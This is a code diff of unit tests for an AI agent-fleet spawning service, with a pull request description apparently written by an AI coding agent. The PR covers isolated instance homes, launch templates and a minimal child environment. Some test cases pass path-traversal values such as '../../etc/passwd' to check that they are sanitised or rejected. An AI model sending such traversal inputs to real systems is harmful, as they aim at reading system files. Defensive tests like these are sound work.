+        expect(() => deriveAgentInstanceHome({instanceRoot: '../../etc', agentId: 'a', harnessType: 'codex'})).toThrow(/absolute/);
+    });
+
+    test('keeps a human-readable prefix so the operator can navigate the instance tree', () => {
+        const result   = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'neo-opus-ada', harnessType: 'codex'}),
+              segments = path.relative(ROOT, result).split(path.sep);
+        // readable prefixes preserved, hash suffixes appended
+        expect(segments[0].startsWith('neo-opus-ada-')).toBe(true);
+        expect(segments[1].startsWith('codex-')).toBe(true);
+
+        // a fully-unsafe id still yields a non-empty, readable-ish segment (sanitized `etc-passwd`)
+        const sneaky = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: '../../etc/passwd', harnessType: 'codex'});
+        expect(path.relative(ROOT, sneaky).split(path.sep)[0]).toContain('etc-passwd');
+    });
+
+    test('the instance root is honored verbatim — same agent/harness under different roots diverges', () => {
+        const
+            a = deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances',  agentId: 'x', harnessType: 'codex'}),
+            b = deriveAgentInstanceHome({instanceRoot: '/data/fleet-instances', agentId: 'x', harnessType: 'codex'});
+
+        expect(a).not.toBe(b);
+        expect(a.startsWith(path.resolve('/srv/fleet-instances')  + path.sep)).toBe(true);
+        expect(b.startsWith(path.resolve('/data/fleet-instances') + path.sep)).toBe(true);
+    });
+
+    test('fails loud on contract violations (no silent default home)', () => {
+        // missing / empty / non-string required args
+        expect(() => deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: '',  harnessType: 'codex'})).toThrow(/agentId/);
+        expect(() => deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 'a', harnessType: ''     })).toThrow(/harnessType/);
+        expect(() => deriveAgentInstanceHome({instanceRoot: '',                     agentId: 'a', harnessType: 'codex'})).toThrow(/instanceRoot/);
+        expect(() => deriveAgentInstanceHome({instanceRoot: '/srv/fleet-instances', agentId: 42,  harnessType: 'codex'})).toThrow(/agentId/);
+        expect(() => deriveAgentInstanceHome({})).toThrow(/instanceRoot/);
+        // a non-absolute instance root is a caller contract violation
+        expect(() => deriveAgentInstanceHome({instanceRoot: 'relative/dir', agentId: 'a', harnessType: 'codex'})).toThrow(/absolute/);
+    });
+});

--- a/test/playwright/unit/ai/services/fleet/deriveHarnessLaunchSpec.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/deriveHarnessLaunchSpec.spec.mjs
@@ -5,16 +5,23 @@ import {deriveHarnessLaunchSpec} from '../../../../../../ai/services/fleet/deriv
 // host-runtime side effects and each case is fully isolated. Mirrors deriveAgentRepoPath.spec.
 
 test.describe('deriveHarnessLaunchSpec (per-family harness launch templates)', () => {
-    test('codex: the binary + empty args + CODEX_HOME pinned to the instance home', () => {
+    test('codex: the binary + the app-server long-lived mode + CODEX_HOME pinned to the instance home', () => {
         const spec = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/srv/instances/a/codex', binaryPath: '/opt/codex'});
 
-        expect(spec).toEqual({command: '/opt/codex', args: [], env: {CODEX_HOME: '/srv/instances/a/codex'}});
+        // `app-server` is the LIVENESS half of the tuple: a bare codex launch exits immediately on a
+        // non-TTY stdin (probed on the exact binary), so the mode arg is template-owned, never a
+        // caller afterthought.
+        expect(spec).toEqual({command: '/opt/codex', args: ['app-server'], env: {CODEX_HOME: '/srv/instances/a/codex'}});
     });
 
-    test('claude-code: the binary + empty args + CLAUDE_CONFIG_DIR pinned to the instance home', () => {
+    test('claude-code: the binary + the stream-json long-lived print mode + CLAUDE_CONFIG_DIR pinned to the instance home', () => {
         const spec = deriveHarnessLaunchSpec({harnessType: 'claude-code', instanceHome: '/srv/instances/a/claude', binaryPath: '/usr/local/bin/claude'});
 
-        expect(spec).toEqual({command: '/usr/local/bin/claude', args: [], env: {CLAUDE_CONFIG_DIR: '/srv/instances/a/claude'}});
+        expect(spec).toEqual({
+            command: '/usr/local/bin/claude',
+            args   : ['--input-format', 'stream-json', '--output-format', 'stream-json', '--print', '--verbose'],
+            env    : {CLAUDE_CONFIG_DIR: '/srv/instances/a/claude'}
+        });
     });
 
     test('env carries ONLY the family home var — the isolation contract, no ambient / extra keys', () => {
@@ -23,14 +30,14 @@ test.describe('deriveHarnessLaunchSpec (per-family harness launch templates)', (
         expect(Object.keys(spec.env)).toEqual(['CODEX_HOME']);
     });
 
-    test('returns a FRESH spec per call — callers append headless/daemon args (exec, app-server) without cross-call bleed', () => {
+    test('returns a FRESH spec per call — a caller mutating args/env never bleeds into the template or later calls', () => {
         const
             a = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: '/b'}),
             b = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: '/b'});
 
-        a.args.push('exec');
+        a.args.push('--extra');
 
-        expect(b.args).toEqual([]);   // the template stayed pristine
+        expect(b.args).toEqual(['app-server']);   // the template stayed pristine
         expect(a.env).not.toBe(b.env);
     });
 

--- a/test/playwright/unit/ai/services/fleet/deriveHarnessLaunchSpec.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/deriveHarnessLaunchSpec.spec.mjs
@@ -1,0 +1,53 @@
+import {test, expect}            from '@playwright/test';
+import {deriveHarnessLaunchSpec} from '../../../../../../ai/services/fleet/deriveHarnessLaunchSpec.mjs';
+
+// Pure function — imported directly (no fs / spawn / env / Neo runtime), so the suite has no
+// host-runtime side effects and each case is fully isolated. Mirrors deriveAgentRepoPath.spec.
+
+test.describe('deriveHarnessLaunchSpec (per-family harness launch templates)', () => {
+    test('codex: the binary + empty args + CODEX_HOME pinned to the instance home', () => {
+        const spec = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/srv/instances/a/codex', binaryPath: '/opt/codex'});
+
+        expect(spec).toEqual({command: '/opt/codex', args: [], env: {CODEX_HOME: '/srv/instances/a/codex'}});
+    });
+
+    test('claude-code: the binary + empty args + CLAUDE_CONFIG_DIR pinned to the instance home', () => {
+        const spec = deriveHarnessLaunchSpec({harnessType: 'claude-code', instanceHome: '/srv/instances/a/claude', binaryPath: '/usr/local/bin/claude'});
+
+        expect(spec).toEqual({command: '/usr/local/bin/claude', args: [], env: {CLAUDE_CONFIG_DIR: '/srv/instances/a/claude'}});
+    });
+
+    test('env carries ONLY the family home var — the isolation contract, no ambient / extra keys', () => {
+        const spec = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: '/b'});
+
+        expect(Object.keys(spec.env)).toEqual(['CODEX_HOME']);
+    });
+
+    test('returns a FRESH spec per call — callers append headless/daemon args (exec, app-server) without cross-call bleed', () => {
+        const
+            a = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: '/b'}),
+            b = deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: '/b'});
+
+        a.args.push('exec');
+
+        expect(b.args).toEqual([]);   // the template stayed pristine
+        expect(a.env).not.toBe(b.env);
+    });
+
+    test('throws on an unknown harnessType, naming the supported set (classification, not a launcher)', () => {
+        const call = () => deriveHarnessLaunchSpec({harnessType: 'gemini-cli', instanceHome: '/h', binaryPath: '/b'});
+
+        expect(call).toThrow(/unsupported harnessType 'gemini-cli'/);
+        expect(call).toThrow(/'claude-code'/);
+        expect(call).toThrow(/'codex'/);
+    });
+
+    test('fails loud on contract violations (no silent default spec)', () => {
+        // missing / empty / non-string required args
+        expect(() => deriveHarnessLaunchSpec({harnessType: '',      instanceHome: '/h', binaryPath: '/b'})).toThrow(/harnessType/);
+        expect(() => deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '',   binaryPath: '/b'})).toThrow(/instanceHome/);
+        expect(() => deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: '/h', binaryPath: ''  })).toThrow(/binaryPath/);
+        expect(() => deriveHarnessLaunchSpec({harnessType: 'codex', instanceHome: 42,   binaryPath: '/b'})).toThrow(/instanceHome/);
+        expect(() => deriveHarnessLaunchSpec({})).toThrow(/harnessType/);
+    });
+});

--- a/test/playwright/unit/ai/services/fleet/dispatchFleetRequest.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/dispatchFleetRequest.spec.mjs
@@ -109,5 +109,8 @@ test.describe('dispatchFleetRequest — the app↔fleet wire allowlist + routing
         expect(FLEET_WIRE_METHODS).not.toContain('getManager');
         expect(FLEET_WIRE_METHODS).not.toContain('getRegistry');
         expect(FLEET_WIRE_METHODS).not.toContain('getIdentityResolver');
+        // the Brain/operator-only raw-launch write path must NEVER ride the wire — pairs with the
+        // registry's defineAgent/updateAgent launch rejection (the mechanical security stop-line)
+        expect(FLEET_WIRE_METHODS).not.toContain('setLaunchOverride');
     });
 });

--- a/test/playwright/unit/ai/services/fleet/dispatchFleetRequest.spec.mjs
+++ b/test/playwright/unit/ai/services/fleet/dispatchFleetRequest.spec.mjs
@@ -112,5 +112,8 @@ test.describe('dispatchFleetRequest — the app↔fleet wire allowlist + routing
         // the Brain/operator-only raw-launch write path must NEVER ride the wire — pairs with the
         // registry's defineAgent/updateAgent launch rejection (the mechanical security stop-line)
         expect(FLEET_WIRE_METHODS).not.toContain('setLaunchOverride');
+        // ...and neither may its READ counterpart: getDefinition is the only surface carrying
+        // metadata.launch (the public projection redacts it), so it stays off the wire too
+        expect(FLEET_WIRE_METHODS).not.toContain('getDefinition');
     });
 });


### PR DESCRIPTION
Resolves #14914

The fleet spawn seam gains per-family harness isolation shaped as curated intent — and, post cycle-1 review, an actually supervisable launch topology plus a mechanical (not rhetorical) authority boundary:

- **`deriveHarnessLaunchSpec`** (pure): per-family launch templates that now carry the LONG-LIVED mode args as template-owned halves of the tuple — `codex` → `['app-server']`, `claude-code` → `['--input-format','stream-json','--output-format','stream-json','--print','--verbose']` — because both CLIs were probed on the exact host binaries and exit immediately when launched bare against a non-TTY/EOF'd stdin. Env carries exactly one key: the family home var (`CODEX_HOME` / `CLAUDE_CONFIG_DIR`) pinned to the instance home.
- **`deriveAgentInstanceHome`** (pure): contained per-instance state homes keyed by stable `agent.id`, never `githubUsername` — two Fleet ids sharing one GitHub account get distinct, restart-stable homes (safeSegment sanitize+hash, `path.relative` containment).
- **`FleetLifecycleService`**: spawns with `stdio: ['pipe', 'ignore', 'pipe']` — the held-open piped stdin IS the liveness contract (ignored stdin = instant EOF exit for both families, empirically). Child env is **minimal by construction**: an explicit ambient allowlist (`HOME LANG LC_ALL LOGNAME PATH SHELL TERM TMPDIR USER`) + the launch template's home var + the four reserved injections (credential, bridge token, tool-projection mode, `NEO_AGENT_IDENTITY`). A tokenless instance can no longer silently inherit the parent `GH_TOKEN` or provider secrets. Reserved keys stay pairwise-distinct, launch-env collisions throw, and prototype keys (`__proto__`/`constructor`/`prototype`) are rejected. The executable preflight is **spawn-equivalent and runs before any secret is resolved or minted**: a candidate must be an executable FILE (X_OK, not mere existence), path-shaped/relative commands resolve against the CHILD's cwd, bare commands against the child's PATH (relative PATH entries cwd-resolved too) — a failing command throws synchronously with no process record and no credential touched. `--version` is captured onto the record, and `status()` surfaces per-home `authRequired` (marker probe: `.credentials.json` / `auth.json`).
- **`FleetRegistryService`**: the raw-launch stop-line is now mechanical — `defineAgent` and `updateAgent` **reject** any `metadata.launch` payload at the storage boundary. The only launch write path is the new `setLaunchOverride` (Brain/operator-only: no bridge member, no wire-allowlist entry — the dispatch spec pins `FLEET_WIRE_METHODS` to exclude it). `claude-code` joined the harness vocabulary, making the curated template reachable end-to-end.
- **`ai/config.template.mjs`**: instance-root + binary resolution moved to ADR-0019 provider leaves — `fleet.instanceRoot` (`NEO_FLEET_INSTANCE_ROOT`) and `fleet.harnessBinaries.{claudeCode,codex}` (`NEO_FLEET_CLAUDE_CODE_BIN` / `NEO_FLEET_CODEX_BIN`), consumed as `AiConfig.fleet.*` at the use site. The prior field → env → embedded-default resolvers (the ADR's A1 pattern, correctly flagged in review) are gone; the instance fields remain solely as test seams.

Evidence: L2 achieved against the L1-required repo-contract ACs — the suite contains a REAL-PROCESS falsifier (actual `child_process.spawn` through the production topology: child alive at 400ms on held-open stdin, SIGTERM stop verified), grounded by exact-host binary probes (`codex app-server` and `claude … stream-json` both ALIVE at 4s on piped stdin; both exit <3s with ignored stdin — the cycle-1 falsified topology, now encoded and tested). Residual: live authenticated two-instance boot [#14914].

## Deltas from ticket

- **`NEO_AGENT_IDENTITY` wired, not just documented**: V-B-A found four live read-side consumers in the MCP identity resolution chain (`RequestContextService` / `Orchestrator` / `KbAlertingService` / `assertExpectedIdentity`), so the spawn injects the fleet agent id as a fourth reserved key.
- **`claude-code` template shipped verified rather than stubbed**: `CLAUDE_CONFIG_DIR` grounded empirically (fresh dir → logged-out instance materializing its own config tree; ambient `~/.claude` untouched).
- **Launch templates own the long-lived mode args** (cycle-1 review correction): a bare derived command is not a runnable rail; the mode args are part of the per-family template contract, never a caller afterthought.
- **Minimal child env replaces full parent-env inheritance** (cycle-1 review correction): isolation-by-allowlist rather than isolation-by-hope.
- **GUI launches (`open -n -a …`) excluded by design** and documented: `open` detaches, so FM could never supervise the actual harness — only directly-spawnable CLI binaries are templated.

## Cycle-2 dispositions (review 4668535092)

- **Public reads redact + clone**: `toPublic` now deep-clones and strips `metadata.launch` from every get/list/wire read; mutating a returned projection can never reach the registry cache. The spawn path reads through the new Brain-internal `getDefinition` (no bridge member, pinned off `FLEET_WIRE_METHODS` — same posture as `setLaunchOverride`, which now returns the raw clone since the public shape could no longer confirm its own write).
- **One secret boundary for every subprocess**: the `--version` probe now runs under the exact child-env object (asserted by reference identity in the spec), via an injectable `execFileFn` seam mirroring `spawnFn`.
- **No transient false-running**: preflight now resolves bare commands against the CHILD's allowlisted PATH synchronously — a missing bare binary throws before any secret is minted or record published; the spec asserts zero spawn calls and no process record.

## Cycle-3 disposition (review 4668657470)

- **Spawn-equivalent preflight**: `resolveExecutable` now requires an executable FILE (`fs.accessSync(X_OK)` + `isFile()`) and resolves path-shaped/relative commands AND relative PATH entries against `opts.cwd ?? process.cwd()` — mirroring execvp's own boundary. Regressions: a real mode-0644 PATH candidate fails synchronously with zero spawn calls and no record; a real `./bin/h` under the child cwd preflights and REAL-spawns consistently (alive on held stdin, SIGTERM stop).
- **Ordering truth**: the preflight moved BEFORE credential resolution and Bridge-token minting; source comments and this body now describe the actual order.

## Test Evidence

- `npm run test-unit -- test/playwright/unit/ai/services/fleet test/playwright/unit/ai/FleetLifecycleService.spec.mjs --workers=1` → **138 passed** at this head (136 prior + the two cycle-3 spawn-equivalence regressions). New coverage: the real-process liveness falsifier (spawn → alive → SIGTERM), curated launch derivation for both families incl. mode args, minimal-env ambient-secret proof (tokenless agent: parent `GH_TOKEN` absent from child env), reserved-slot collision + `__proto__` rejection, identity injection, stdio-topology assertion, missing-binary preflight, live `authRequired` flip (mkdtemp home + marker write → recompute), defineAgent/updateAgent launch rejection, `setLaunchOverride` write/clear, and `FLEET_WIRE_METHODS` pinned to exclude `setLaunchOverride`. Path-containment specs kept intact.
- `node --check` green on all touched sources; pre-commit gates green (whitespace, shorthand, aiconfig-test-mutation, jsdoc-types, ticket-archaeology, block-alignment).
- Branch rebased onto `origin/dev` pre-push per branch-freshness gate; scoped suite re-verified post-rebase.

## Post-Merge Validation

- [ ] Operator-assisted: define + start TWO codex-family Fleet agents sharing one GitHub account → distinct `CODEX_HOME` homes, restart-stable paths, per-home `codex login` required exactly once each (`authRequired` flips false)
- [ ] The first real gpt-family sibling boots through this seam (the peer-onboarding rail's own thesis)

## Commits

- 0cd83af87 — `feat(fleet)`: both pure modules + specs, `FleetLifecycleService` curated-intent resolution, env extension + reserved-key guard, identity-env injection, security-boundary JSDoc.
- 64d877b35 — `fix(fleet)`: cycle-1 Required Actions — supervisable launch topology (mode args + piped stdin), mechanical raw-launch stop-line (`defineAgent`/`updateAgent` rejection + `setLaunchOverride`), minimal child env allowlist, ADR-0019 provider leaves, binary preflight + `authRequired`, and the positive lifecycle/security test matrix incl. the real-process falsifier.
- eed4a24ee — `fix(fleet)`: cycle-2 P1s — launch redaction + deep-clone on public reads (`getDefinition` as the Brain-internal spawn-path read), minimal-env version probe (`execFileFn` seam), synchronous bare-command PATH preflight.
- f6cc606dc — `fix(fleet)`: cycle-3 — spawn-equivalent preflight (X_OK executable check, child-cwd resolution for relative commands + relative PATH entries), ordered before secret resolution/minting; two real-process regressions.

Related: #13015 (parent epic) · #14807 (account model consumes these shapes) · #14915 / #14916 (rail siblings) · ADR-0019 (config authority) · on-ticket security-constraints comment (cross-family peer audit, folded mid-implementation).

Authored by Mnemosyne (Claude Fable 5, Claude Code). Session b956ba53-01ed-4ea6-a1e5-62969f887bc3.
